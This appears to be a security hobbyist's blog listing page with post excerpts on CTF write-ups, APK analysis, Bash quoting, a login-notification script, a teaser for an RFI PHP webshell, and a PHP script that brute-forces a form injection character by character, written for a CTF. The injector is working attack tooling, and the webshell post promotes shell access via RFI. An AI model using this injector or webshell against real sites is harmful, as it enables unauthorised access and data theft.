DerbyCon 9 – DomainTools CTF – Reversing

Part three of the DerbyCon DomainTools CTF write-ups.  You can find coverage of all the Crypto challenges here and coverage of all the Forensics challenges here.  This finishes up the solutions for every challenge in the CTF, broken up by the same section names that they used.  When possible, I’ll also be creating CyberChef recipes to directly solve each challenge, and linking to them following the solution description.  Let’s get started!

Continue reading “DerbyCon 9 – DomainTools CTF – Reversing”

Analyzing Multiple APKs At Once

This falls into that series of things where I had to make something work when there wasn’t a pre-built package, so I’m documenting it here in case (1) I ever need to do this again, or (2) someone else can benefit from it.  Let’s say you’re looking into a device that runs on Android, and it has a bunch of APKs that you have no clue what to do with… why not use some common tools to quickly process all of those files?

Continue reading “Analyzing Multiple APKs At Once”

TILFH: Quotes and When to Use Them

One thing that always confuses me when I’m writing Bash scripts is what type of quote to use in a given situation. Luckily, Hermit schooled me with this quick rundown:

“SOMETHING” = This means evaluate what’s between the quotes.

‘SOMETHING’ = This means don’t evaluate what’s between the quotes. This is a literal string.

`SOMETHING`= This means execute the stuff between the quotes and spit out the result. NOTE: These little back quotes are hard to find. Look on the tilde key.

$(SOMETHING) = Same as above.

– Killswitch

RFI PHP Webshell Injector

Sometimes you just need a quick PHP webshell to complement your RFI vulnerability you’ve uncovered.  There are plenty of “fancy” ones with lots of features, but I prefer simple, effective, command-line equivalent access any day.  If you’re of that persuasion as well, just use this as the target of your RFI to give yourself Hermit’s Stupidly Simple WebShell (HSSWS).  Enjoy!

Continue reading “RFI PHP Webshell Injector”

Linux Login Notifier

Here’s a quick script I wrote some years ago to notify me when an interactive session is being launched from one of my servers. Feel free to modify/use however you see fit. Thanks!

# Place this in /etc/profile.d/
THATUSER=`awk -v USER=$UID -F : '$3 == USER {print $1}' /etc/passwd`
CURTIME=`date --rfc-3339=ns`
echo "Login from ${THATUSER} (${UID}) on ${CURTIME}" | mail -aFrom:${FROMADDRESS} -s "${THATUSER} just logged into ${THESYSTEM}" -r ${FROMADDRESS} ${NOTIFYADDRESS}

It just fires off an email whenvever an interactive session is started.

Quick PHP Injector

Just posting this for anyone that may need something similar in the future.  The below is my quick code that I use to brute force/programmatically assess form injection.  I wrote it when working through (CTF NAME REDACTED).  If it helps, enjoy.  Please attribute appropriately if you repurpose it, however.

// Name: PHP-Injector-Template
// Author: Brian Mork (Hermit)
// Last Modified: 2016-04-08

// This version assumes basic authentication and POST method
$options = array(
     'http' => array(
          'header' => "Content-type: application/x-www-form-urlencodedrnAuthorization: Basic " . base64_encode("$leveluser:$levelpass"),
          'method' => 'POST',
          'content' => http_build_query($testpush)

// Build the context for the request using all of the above
$context = stream_context_create($options);

// Actually submit it
$result = file_get_contents($url, false, $context);

// Check for a failed connection state (just in case)
if ($result === FALSE) {
     print "Failed to connect\n\n";
} else {
// Look for "INDICATOR" which indicates successful injection and return based upon that...
     if (preg_match("/INDICATOR/", $result)) {
          return $trialdata;
     } else {
          return null;

// Zeroize the recovery key
$recoverkey = '';

// Build an array which is [A-Za-z0-9]
// Modify as appropriate for other use cases
$allchars = array_merge(range('A', 'Z'), range('a', 'z'), range(0, 9));

// List how many characters to limit the search to
$loopcount = 123;
// Loop through and test
foreach ( range(1, $loopcount) as $looper ) {
     $breakflag = 'FALSE';
     foreach( $allchars as $onechar) {
          // Bypass method to avoid unnecessary tries
          if ($breakflag === 'FALSE') {
               // We need to track the single character separately from the injection test
               // so the below builds the test portion
               $testkey = $recoverkey . $onechar;
               // Check it using the above function
               $poscheck = post_data($testkey);
               // If we didn't get null, it was good... let me know!
               if ($poscheck !== null) {
                    $breakflag = 'TRUE';
                    $recoverkey .= $onechar;
                    echo "\nFound new position! Current recovery is: " . $recoverkey . "\n";
               } else {
                    // I just like to see that it's still working
                    echo ".";

// Once we've reached the full number of characters, break and print the key
print "Found key of: " . $recoverkey . "\n\n";


Website Powered by

Up ↑